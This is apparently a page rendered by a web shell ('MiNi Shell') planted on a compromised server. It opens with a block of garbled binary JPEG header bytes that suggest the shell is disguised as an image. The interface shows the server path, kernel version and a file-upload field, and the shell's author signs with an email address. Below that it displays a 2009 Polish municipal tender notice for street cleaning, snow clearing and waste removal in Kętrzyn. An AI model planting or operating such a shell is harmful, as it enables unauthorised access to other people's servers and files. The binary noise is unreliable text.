JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/127536-N-2009.html

<p class="kh_header"><b>Kętrzyn: Sprzątanie, usuwanie odpadów, utrzymanie zieleni w pasach drogowych oraz usługi towarzyszące</b><br>
<b>Numer ogłoszenia: 127536 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kętrzyn , ul. Wojska Polskiego 11, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 752 05 20, faks 089 752 05 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ketrzyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie, usuwanie odpadów, utrzymanie zieleni w pasach drogowych oraz usługi towarzyszące.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: Sprzątanie, usuwanie odpadów, utrzymanie zieleni w pasach drogowych oraz usługi towarzysząc,  obejmuje:
A. Usługi zamiatania i usługi towarzyszące w obrębie jezdni(1.04-31.10):
1)	zamiatanie ręczne i mechaniczne utwardzonych nawierzchni jezdni, parkingów i ścieżek rowerowych w pasie drogowym,
2)	oczyszczanie nawierzchni ażurowych (z płyt np. yombo) i gruntowych, 
3)	odchwaszczanie poboczy, linii krawężników,
4)	usuwanie zmiotek ulicznych,
5)	usuwanie piasku pozimowego z jezdni po zakończeniu sezonu zimowego - nie później niż do 25 kwietnia (chyba, że warunki atmosferyczne nie będą na to pozwalały),
6)	polewanie (zraszanie) jezdni ulic: Sikorskiego, Wojska Polskiego, Skłodowskiej w okresach wysokich temperatur powodujących upłynnienie asfaltu (założenie: temp. powietrza atm. powyżej 28oC trwająca dłużej niż 1 dzień - dwukrotne zraszanie całej powierzchni w dniu),

B. Usługi zamiatania i usługi towarzyszące w obrębie chodników (1.04-31.10):
1)	zamiatanie ręczne i mechaniczne utwardzonych nawierzchni chodników w pasie drogowym, 
2)	odchwaszczanie obrzeży chodnikowych i spoin chodnikowych,
3)	usuwanie zmiotek ulicznych i innych odpadów powstałych na chodniku,
 
C. Usługi odśnieżania, usuwania oblodzeń w obrębie chodników (01.11-31.03):
1)	zapewnienie materiałów do zimowego utrzymania chodników i ich rozmieszczenie w rejonie objętych zadaniem (w pojemnikach),
2)	uprzątanie błota, śniegu, lodu z chodnika rozumiane jako stosowanie środków chemicznych i mechanicznych mających na celu zebranie i przemieszczenie mas do krawędzi chodnika a następnie usuwanie (wywożenie) zebranych mas ze szczególnym uwzględnieniem:
1)	miejsc związanych z przejściami dla pieszych, 
2)	bezpieczeństwa ruchu na chodniku,
3)	zwalczanie śliskości zimowej:
1)	bezzwłocznie po zaprzestaniu opadów, 
2)	przy opadach długookresowych: stosownie do panujących warunków atmosferycznych,
3)	bezzwłocznie po wystąpieniu po gołoledzi,
4)	w/g potrzeb w pozostałych przypadkach, 
4)	bieżące oczyszczanie chodników, usuwanie śniegu, lodu, błota oraz stosowanie środków chemicznych i mechanicznych w obrębie przejść dla pieszych, 
5)	bezzwłoczne przystąpienie do odkuwania lodu przy urządzeniach kanalizacji burzowej - w okresach odwilży,
6)	bieżące usuwanie piasku pozimowego z chodnika (po każdorazowym zejściu pokrywy lodowej),
7)	bieżące uprzątanie innych zanieczyszczeń z chodników w pasach drogowych,

D. Usługi w zakresie trawników - utrzymanie zieleni drogowej (1.04-31.10):
1)	systematyczne koszenie trawników (założenie: maksymalna wysokość trawy do 10 cm), 
2)	bieżące grabienie i wywóz skoszonej trawy, liści i odpadów organicznych - zagospodarowanie odpadów zgodne z obowiązującymi przepisami,
3)	bieżące uprzątanie innych zanieczyszczeń z terenów zieleni drogowej,
4)	bieżąca naprawa ubytków trawników w miejscach ubytku polegająca na przygotowaniu gleby i dosianiu nasion lub wyłożeniu nowej darni.

E. Usługi gospodarki odpadami - wywóz odpadów w obrębie jezdni i chodników (cały rok):
1)	codzienne opróżnianie koszy ulicznych, 
2)	segregacja i zagospodarowanie zebranych odpadów,
3)	konserwacja koszy ulicznych,
4)	bezzwłoczne usuwanie odpadów pochodzenia organicznego, mineralnego oraz innych, powstałych w pasie drogowym w związku z intensywnymi opadami atmosferycznymi i w innych okolicznościach.
2.	Zamawiający zakłada możliwość czasowego zwiększenia lub zmniejszenia zakresu rzeczowego przedmiotu zamówienia, z realizacją w dowolnym okresie trwania umowy, związanego z koniecznością utrzymania dróg wybudowanych lub poddawania dróg modernizacjom lub z innych przyczyn nie możliwych do sprecyzowania w chwili przygotowywania zamówienia.
3.	Szczegółowy wykaz terenów i pozostałych elementów objętych przedmiotem zamówienia zawiera załącznik nr 1 do SIWZ.
4.	Szczegółowe warunki usługi odśnieżania i usuwania oblodzeń na chodnikach zawiera załącznik nr 2 do SIWZ. 
5.	Szczegółowy zakres zamówienia zawiera załącznik nr 5 do SIWZ - Wzór umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 90.51.10.00-2, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. 	Oferta musi być zabezpieczona wadium o wartości 5.000,00 zł wniesionym przed upływem terminu składania ofert określonym w punkcie 11 ust. 1 SIWZ.
 2. 	Wadium może być wniesione w jednej lub kilku następujących formach:
 1) 	pieniądzu,
 2) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
 3) 	gwarancjach bankowych,
 4) 	gwarancjach ubezpieczeniowych,
 5) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
 3. 	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: Gmina Miejska Kętrzyn, 11-400 Kętrzyn, ul. Wojska Polskiego 11, Pekao SA nr konta  94 1240 5598 1111 0000 5032 0624, z dopiskiem: WADIUM - Sprzątanie, usuwanie odpadów, utrzymanie zieleni w pasach drogowych oraz usługi towarzyszące. Wadium musi wpłynąć najpóźniej do dnia i godziny składania ofert.
 4. 	Wadium w pozostałych formach należy wnieść wraz z ofertą, przy czym należy je dołączyć w sposób umożliwiający późniejszy zwrot.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	o zamówienie mogą ubiegać się wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. posiadają: 
- aktualne na dzień otwarcia ofert zezwolenie na prowadzenie działalności w zakresie transportu odpadów komunalnych (zgodnie z przepisami ustawy z dnia 27.04.2001r. o odpadach, Dz. U. z 2007r., Nr 39, poz. 251 z późn. zm.),
- aktualne na dzień otwarcia ofert zezwolenie na odzysk lub unieszkodliwianie odpadów komunalnych  (zgodnie z przepisami ustawy z dnia 27.04.2001 r. o odpadach, Dz. U. z 2007r., Nr 39, poz. 251 z późn. zm.) lub oświadczenie o współpracy z podmiotem gospodarczym uprawnionym do odzysku lub unieszkodliwiania odpadów komunalnych;
- aktualne na dzień otwarcia ofert zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o których mowa w art. 7 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach .
b)	posiadają niezbędną wiedzę i doświadczenie, tj. wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj. chodzi o usługę obejmującą utrzymanie czystości terenów publicznych przez okres co najmniej 12 kolejnych miesięcy o wartości minimum 500.000 zł (słownie: pięćset tysięcy zł 00/100), z podaniem ich wartości oraz daty i miejsca wykonania;
c)	dysponują potencjałem technicznym lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego pozwalającego na odpowiednie wykonanie zamówienia, tj. 
- minimum 1 zamiatarka do utrzymania pasów drogowych, 
- minimum 1 pojazd do utrzymania czystości chodników, 
- minimum 1 pojazd do zwalczania śliskości zimowej (dopuszcza się urządzenia z wymiennymi zespołami do letniego i zimowego utrzymania chodników), 
- minimum 4 kosy mechaniczne.
d)	dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia wymaganych do wykonania zamówienia osób;
- minimum jedną osobę posiadającą uprawnienia do obsługi zamiatarki do utrzymania pasów drogowych;
- minimum jedną osobę posiadającą uprawnienia do obsługi pojazdu do utrzymania czystości chodników;
- minimum jedną osobę posiadającą uprawnienia do obsługi pojazdu do zwalczania śliskości zimowej;
- minimum dwie osoby posiadające uprawnienia do obsługi kos mechanicznych.
e)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  tj. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 100.000,00 złotych (sto tysięcy zł 00/100),
f)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych,
2)	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, ocena spełnienia warunków określonych w pkt.1 lit. b - e będzie dokonana łącznie w stosunku do wspólnie występujących wykonawców. 
3)	opis sposobu dokonywania oceny spełniania warunków.
a)	Zamawiający dokona oceny spełniania w/w warunków w  oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez wykonawcę zgodnie z formułą (spełnia - nie spełnia)
b)	Nie uzupełnienie przez Wykonawców oświadczeń lub dokumentów w określonym terminie skutkować będzie wykluczeniem Wykonawcy z postępowania, ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia posiadania uprawnień do wykonywania określonej działalności lub czynności oraz niepodlegania wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych, należy dołączyć do oferty:
 1) 	oświadczenie zgodne z art. 22 ust. 1 ustawy Prawo zamówień publicznych (na formularzu oferty - załączniku nr 1 do SIWZ),
 2) 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu (w formie oryginału lub potwierdzonej notarialnie kopii) wskazującego osobę uprawnioną do reprezentowania składającego (składających) ofertę, w przypadku spółek cywilnych należy załączyć wpis do ewidencji działalności gospodarczej każdego ze wspólników oraz umowę regulującą współpracę podmiotów występujących wspólnie,
 3) 	aktualne na dzień otwarcia ofert zezwolenie na prowadzenie działalności w zakresie transportu odpadów komunalnych (zgodnie z przepisami ustawy z dnia 27.04.2001r. o odpadach, Dz.U. z 2007r., Nr 39, poz. 251 z późn. zm.) ,
 4) 	aktualne na dzień otwarcia ofert zezwolenie na odzysk lub unieszkodliwianie odpadów komunalnych  (zgodnie z przepisami ustawy z dnia 27.04.2001r. o odpadach, Dz.U. z 2007r., Nr 39, poz. 251 z późn. zm.) lub oświadczenie o współpracy z podmiotem gospodarczym uprawnionym do odzysku lub unieszkodliwiania odpadów komunalnych;
Uwaga. Warunki opisane w ppkt 3) i 4) niniejszego ustępu uznawać się będzie za spełnione także w przypadku w którym do oferty załączone będzie zezwolenie obejmujące łącznie działalność w zakresie odzysku lub unieszkodliwiania odpadów oraz transportu odpadów,

 5) 	aktualne na dzień otwarcia ofert zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o których mowa w art. 7 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach .
 6) 	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
 2. 	W celu potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia należy dołączyć do oferty:
 1) 	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług, z których co najmniej jedna polega na utrzymaniu czystości terenów publicznych przez okres co najmniej 12 kolejnych miesięcy o wartości minimum 500.000 zł (słownie: pięćset tysięcy zł 00/100), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie (np. listy referencyjne) - sporządzony według wzoru określonego w załączniku nr 6 do SIWZ - Wykaz usług,
	3. W celu potwierdzenia warunku dysponowania potencjałem technicznym wykonawca złoży: 
1)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca - sporządzony według wzoru określonego w załączniku nr 7 do SIWZ- Wykaz narzędzi i urządzeń,
2)	w przypadku korzystania w zakresie zaplecza technicznego z potencjału innych podmiotów - pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń; 
4.	 W celu potwierdzenia warunku dysponowania osobami zdolnymi do wykonania zamówienia, wykonawca złoży: 
1)	wykaz osób, którymi dysponuje lub będzie dysponować wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - sporządzony według wzoru określonego w załączniku nr 8 do SIWZ - Wykaz  osób i podmiotów. Do wykazu osób muszą być dołączone dokumenty potwierdzające posiadanie kwalifikacji niezbędnych do wykonania prac objętych zamówieniem;
2)	w przypadku korzystania w zakresie zaplecza osobowego z potencjału innych podmiotów  -pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,  
5.	W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy dołączyć do oferty:
1) Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - na sumę ubezpieczenia (sumę gwarancyjną) co najmniej 100.000 zł (sto tysięcy zł 00/100)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ketrzyn.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kętrzyn
11-400 Kętrzyn, ul. Wojska Polskiego 11
pokój 301.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 10:00, miejsce: Urząd Miasta Kętrzyn
11-400 Kętrzyn, ul. Wojska Polskiego 11, 
Punkt Informacyjny (parter Urzędu Miasta).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com